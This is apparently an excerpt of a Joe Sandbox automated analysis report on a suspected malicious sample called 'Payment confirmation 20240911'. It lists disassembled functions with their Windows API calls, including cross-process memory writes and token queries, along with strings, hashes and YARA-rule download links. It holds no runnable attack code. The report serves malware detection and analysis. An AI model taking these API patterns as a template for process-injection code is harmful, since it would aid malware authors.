                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: PerformanceQuery$CounterSleep$Frequency
                                          • String ID:
                                          • API String ID: 2833360925-0
                                          • Opcode ID: e4245c3abf06a4397aeaaf90bb96daa277888280e1630d028b9909cd33762d27
                                          • Instruction ID: 1945ab55c8d994f83178f89759b101ae15cc707424bcbfd6d4548a3c6b6dc426
                                          • Opcode Fuzzy Hash: e4245c3abf06a4397aeaaf90bb96daa277888280e1630d028b9909cd33762d27
                                          • Instruction Fuzzy Hash: 2F012939E0062DDBDF10AFE8E948AEEBBBCFB0C715F044495E641B2164DBB09550CBA1
                                          Function 0131A857 Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CLSIDFromProgID.OLE32 ref: 0131A874
                                          • ProgIDFromCLSID.OLE32(?,00000000), ref: 0131A88F
                                          • lstrcmpiW.KERNEL32(?,00000000), ref: 0131A89D
                                          • CoTaskMemFree.OLE32(00000000), ref: 0131A8AD
                                          • CLSIDFromString.OLE32(?,?), ref: 0131A8B9
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: From$Prog$FreeStringTasklstrcmpi
                                          • String ID:
                                          • API String ID: 3897988419-0
                                          • Opcode ID: d08d79e81f5f9b89c89f1b9693d0b7617b4c1fbd86c05eee4560f79dae91bda9
                                          • Instruction ID: 09a83c0c079d6608b268a63e3697ff4ae35a15b6905181cee7285059af56a192
                                          • Opcode Fuzzy Hash: d08d79e81f5f9b89c89f1b9693d0b7617b4c1fbd86c05eee4560f79dae91bda9
                                          • Instruction Fuzzy Hash: 67018F76601205AFEB244FA8DC48B9ABFEDEF44356F108024FE45D3218D770DD418BA0
                                          Function 0131B78E Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0131B7A5
                                          • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 0131B7AF
                                          • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 0131B7BE
                                          • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 0131B7C5
                                          • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0131B7DB
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: HeapInformationToken$AllocErrorLastProcess
                                          • String ID:
                                          • API String ID: 44706859-0
                                          • Opcode ID: a47465934a1584470f93ef2515eefd966ac88c6e55c290949ee51ec17ff294c7
                                          • Instruction ID: 86b7d5e96e83800db7a36dd2aae87d4b5e7de7f3b526420103450d5f1bfb9a83
                                          • Opcode Fuzzy Hash: a47465934a1584470f93ef2515eefd966ac88c6e55c290949ee51ec17ff294c7
                                          • Instruction Fuzzy Hash: 9BF04F71240204AFEB211FA9AC89E677BBCFF46759F148019FA81C7158DA6198518B60
                                          Function 0131B7EF Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0131B806
                                          • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0131B810
                                          • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0131B81F
                                          • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0131B826
                                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0131B83C
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: HeapInformationToken$AllocErrorLastProcess
                                          • String ID:
                                          • API String ID: 44706859-0
                                          • Opcode ID: 46498e9061f2eb9741c2ab96357b6e586ed38e6b403463f12b77b77f94b05615
                                          • Instruction ID: 8aeea5cef0b7ff5aa88697ab8d6354bab1595e100cadd11fbcafa0f79a4ca9d9
                                          • Opcode Fuzzy Hash: 46498e9061f2eb9741c2ab96357b6e586ed38e6b403463f12b77b77f94b05615
                                          • Instruction Fuzzy Hash: 31F04F75200244AFEB211FA9EC88F677F7CFF46B58F104029FA81C7158CA619851CB60
                                          Function 0131FA7B Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetDlgItem.USER32(?,000003E9), ref: 0131FA8F
                                          • GetWindowTextW.USER32(00000000,?,00000100), ref: 0131FAA6
                                          • MessageBeep.USER32(00000000), ref: 0131FABE
                                          • KillTimer.USER32 ref: 0131FADA
                                          • EndDialog.USER32 ref: 0131FAF4
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: BeepDialogItemKillMessageTextTimerWindow
                                          • String ID:
                                          • API String ID: 3741023627-0
                                          • Opcode ID: a6e2622e81caf0846be2a394f51918c8b9a69b145f76b3a2c25bc0a0469a80d9
                                          • Instruction ID: 90480de265f7d47f0d5f0059a77c0147ac9082be5d765f24c7dbef915527073c
                                          • Opcode Fuzzy Hash: a6e2622e81caf0846be2a394f51918c8b9a69b145f76b3a2c25bc0a0469a80d9
                                          • Instruction Fuzzy Hash: 9B018131600705ABFB359B54DD4EB967BBCBF00B09F044159E283A54E5DBF8A9488F80
                                          Function 012FB517 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Path$ObjectStroke$DeleteFillSelect
                                          • String ID:
                                          • API String ID: 2625713937-0
                                          • Opcode ID: f7ab14ebb3f369d088d22742da1f3301279ec2ec62bac1500a76e28c1c0a18cf
                                          • Instruction ID: 7036b696c0cf4ec94e7bc4aa6ab2944dc579ed9d8d7db6b63508b8230f266ebc
                                          • Opcode Fuzzy Hash: f7ab14ebb3f369d088d22742da1f3301279ec2ec62bac1500a76e28c1c0a18cf
                                          • Instruction Fuzzy Hash: 58F0F930110209EBDB755F69F90CB647FEDBB11362F588228F6A9481F8C7788596DF10
                                          Function 0132FA15 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 277comCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CoInitialize.OLE32(00000000), ref: 0132FAB2
                                          • CoCreateInstance.OLE32(0136DA7C,00000000,00000001,0136D8EC,?), ref: 0132FACA
                                            • Part of subcall function 012ECAEE: _memmove.LIBCMT ref: 012ECB2F
                                          • CoUninitialize.OLE32 ref: 0132FD2D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: CreateInitializeInstanceUninitialize_memmove
                                          • String ID: .lnk
                                          • API String ID: 2683427295-24824748
                                          • Opcode ID: 8da616f9f25d2707f9b75f4ccb2a97ee24c6a41187030a0da3ff95a59a496ba6
                                          • Instruction ID: b7aa402d5eb25208ec198d62436227d03f28ab0a941a366b46a28c58cc82a33d
                                          • Opcode Fuzzy Hash: 8da616f9f25d2707f9b75f4ccb2a97ee24c6a41187030a0da3ff95a59a496ba6
                                          • Instruction Fuzzy Hash: 72A140B1514206AFD300EF94C894EABB7EDEF99704F40492DF195D7191EB70EA09CB92
                                          Function 0132EFCD Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 013278AD: GetFullPathNameW.KERNEL32(?,00000105,?,?), ref: 013278CB
                                          • CoInitialize.OLE32(00000000), ref: 0132F04D
                                          • CoCreateInstance.OLE32(0136DA7C,00000000,00000001,0136D8EC,?), ref: 0132F066
                                          • CoUninitialize.OLE32 ref: 0132F083
                                            • Part of subcall function 012E84A6: __swprintf.LIBCMT ref: 012E84E5
                                            • Part of subcall function 012E84A6: __itow.LIBCMT ref: 012E8519
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                          • String ID: .lnk
                                          • API String ID: 2126378814-24824748
                                          • Opcode ID: a2fb3f3123b1f9e530ed5ad5ae10d9318c83980ff1abca84441f88440f3dfac7
                                          • Instruction ID: 8e1ec3ae7a1263d747d131da4e9152a1398d32c04286375b95e1f1076080679a
                                          • Opcode Fuzzy Hash: a2fb3f3123b1f9e530ed5ad5ae10d9318c83980ff1abca84441f88440f3dfac7
                                          • Instruction Fuzzy Hash: 29A135756143119FCB10EF54C884D2ABBF9FF89324F148988E99A9B361DB31EC45CB91
                                          Function 012FDA5A Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 162COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: #$+
                                          • API String ID: 0-2552117581
                                          • Opcode ID: a99dd3ed056c363cb2be35cd83ad6d2d4e33f44cb8cf4eb82c5c246ac3cf8fed
                                          • Instruction ID: d9e7323aeafa920c8d32ab3d4afbc2e985d80674ed76d1d1ada8c78507cab45f
                                          • Opcode Fuzzy Hash: a99dd3ed056c363cb2be35cd83ad6d2d4e33f44cb8cf4eb82c5c246ac3cf8fed
                                          • Instruction Fuzzy Hash: FF51243510425ADFEF19DFACC454AF9BBA4EF1A714F144069EE819B290E7309896CB20
                                          Function 0132503C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122COMMON
                                          Download Yara Rule
                                          APIs
                                          • CharUpperBuffW.USER32(0000000C,00000016), ref: 0132507B
                                            • Part of subcall function 012E84A6: __swprintf.LIBCMT ref: 012E84E5
                                            • Part of subcall function 012E84A6: __itow.LIBCMT ref: 012E8519
                                            • Part of subcall function 012EB8A7: _memmove.LIBCMT ref: 012EB8FB
                                          • CharUpperBuffW.USER32(?,?), ref: 013250FB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: BuffCharUpper$__itow__swprintf_memmove
                                          • String ID: REMOVE$THIS
                                          • API String ID: 2528338962-776492005
                                          • Opcode ID: 44e8ec356d206f3f9edf1499ee0a562d79d6fd6fe1c4da193aa11bd6599b4407
                                          • Instruction ID: f9d4235d2eb0e4b816411aaa6cd8babe5f6a9357381be4430d7d7574bf31bba5
                                          • Opcode Fuzzy Hash: 44e8ec356d206f3f9edf1499ee0a562d79d6fd6fe1c4da193aa11bd6599b4407
                                          • Instruction Fuzzy Hash: 6D418275A0021A9FDF01EF68C884ABEB7F5FF48218F148059D95AAB351D734ED45CB50
                                          Function 0131CF7F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 01324D41: WriteProcessMemory.KERNEL32 ref: 01324D6B
                                          • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0131CFC9
                                            • Part of subcall function 01324D0C: ReadProcessMemory.KERNEL32 ref: 01324D36
                                            • Part of subcall function 01324C65: GetWindowThreadProcessId.USER32(?,?), ref: 01324C90
                                            • Part of subcall function 01324C65: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0131C9C2,00000034,?,?,00001004,00000000,00000000), ref: 01324CA0
                                            • Part of subcall function 01324C65: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0131C9C2,00000034,?,?,00001004,00000000,00000000), ref: 01324CB6
                                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0131D036
                                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0131D083
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                          • String ID: @
                                          • API String ID: 4150878124-2766056989
                                          • Opcode ID: a850a0609406dedbba4142205e40228cd46ece8f2813321db49d24d520081acc
                                          • Instruction ID: f8adf284a21dfd65ddf414158e7a28e3c4b3db461183b2d2d9c6a46a56c5341c
                                          • Opcode Fuzzy Hash: a850a0609406dedbba4142205e40228cd46ece8f2813321db49d24d520081acc
                                          • Instruction Fuzzy Hash: 7A415072900229BFDB15EF98CC84FDEBBB8EF55704F108095EA45B7180DA706E45CB61
                                          Function 0134A44D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                                          Download Yara Rule
                                          APIs
                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 0134A4E6
                                          • GetWindowLongW.USER32 ref: 0134A503
                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0134A513
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Window$Long
                                          • String ID: SysTreeView32
                                          • API String ID: 847901565-1698111956
                                          • Opcode ID: cac002a58466aaea3b18915bcb4d12f47d46da50758d017f0625857a79f5cfea
                                          • Instruction ID: 27f1f5f53d9e021f6e53420a91446bf98d17c564a6150f9b1cf5c4285e17f435
                                          • Opcode Fuzzy Hash: cac002a58466aaea3b18915bcb4d12f47d46da50758d017f0625857a79f5cfea
                                          • Instruction Fuzzy Hash: A031A535240206AFDB219E78CC44BEA7BA9FF49338F144725F9B6A32E0D734E8519B50
                                          Function 0134A578 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 96windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 0134A668
                                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0134A67D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: MessageSend
                                          • String ID: '$`"u
                                          • API String ID: 3850602802-1436103891
                                          • Opcode ID: c3987e161e075fb2b135d131c6b8be14498eaf427502f87da927c9b2df27972b
                                          • Instruction ID: 998d9b4c7168832dbf590d9f2f9b44bfe7a0c37fd89fc74e0d53f19f2615b9c5
                                          • Opcode Fuzzy Hash: c3987e161e075fb2b135d131c6b8be14498eaf427502f87da927c9b2df27972b
                                          • Instruction Fuzzy Hash: A5410875A40209DFDB54CFA8D980BDA7BF9FB49314F10406AE946AB345D770A941CF90
                                          Function 013497B2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 0134983D
                                          • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 0134984D
                                          • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 01349872
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: MessageSend$MoveWindow
                                          • String ID: Listbox
                                          • API String ID: 3315199576-2633736733
                                          • Opcode ID: 711827a30cf0121e89f04138671b431d66fe7e713c924b5d5582d578e72e03df
                                          • Instruction ID: 4ef4c85dee1a733aa2f9e8ad7791eb112103bcc4bf9c2ba4657a1073d0901408
                                          • Opcode Fuzzy Hash: 711827a30cf0121e89f04138671b431d66fe7e713c924b5d5582d578e72e03df
                                          • Instruction Fuzzy Hash: 4A218331610118BFEF228F59CC85FAB3BAEEF8D76CF018124F9555B191C671AC5187A0
                                          Function 0134A217 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0134A27B
                                          • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 0134A290
                                          • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 0134A29D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: MessageSend
                                          • String ID: msctls_trackbar32
                                          • API String ID: 3850602802-1010561917
                                          • Opcode ID: 485430126d78311e70c7a5afe73bf96583598c66b42be01166e5dd79ca625dce
                                          • Instruction ID: 5aa5a9b89d4386e3ae275aed8d4e5438df0c80139d083765a7e4f670bf319d20
                                          • Opcode Fuzzy Hash: 485430126d78311e70c7a5afe73bf96583598c66b42be01166e5dd79ca625dce
                                          • Instruction Fuzzy Hash: 08113671240308BFEF215F65CC05FA73BECEF88B18F014128FA42A7090C272A821DB60
                                          Function 0134D784 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetForegroundWindow.USER32 ref: 0134D786
                                          • GetFocus.USER32(?,00000000,00000000,?,?,?,0135F381,?,?,?,?,?), ref: 0134D78E
                                            • Part of subcall function 012FAF7D: GetWindowLongW.USER32(?,000000EB), ref: 012FAF8E
                                            • Part of subcall function 012FB155: GetWindowLongW.USER32(?,000000EB), ref: 012FB166
                                          • SendMessageW.USER32(007542E0,000000B0,000001BC,000001C0), ref: 0134D800
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Window$Long$FocusForegroundMessageSend
                                          • String ID: `"u
                                          • API String ID: 3601265619-810275233
                                          • Opcode ID: 1a4f23c56a63a321b01865d20dfbd5c080cd7c3c45579d3a763c24f56c39e6c0
                                          • Instruction ID: c20582426b1ebabfdb736cdbd2200f96fe29b891d25671db56eff45e40ec9526
                                          • Opcode Fuzzy Hash: 1a4f23c56a63a321b01865d20dfbd5c080cd7c3c45579d3a763c24f56c39e6c0
                                          • Instruction Fuzzy Hash: A00196356002008FD7259E6CD884A757FE9BB89324F59426DD519873A5DB316806CB50
                                          Function 01302F5F Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
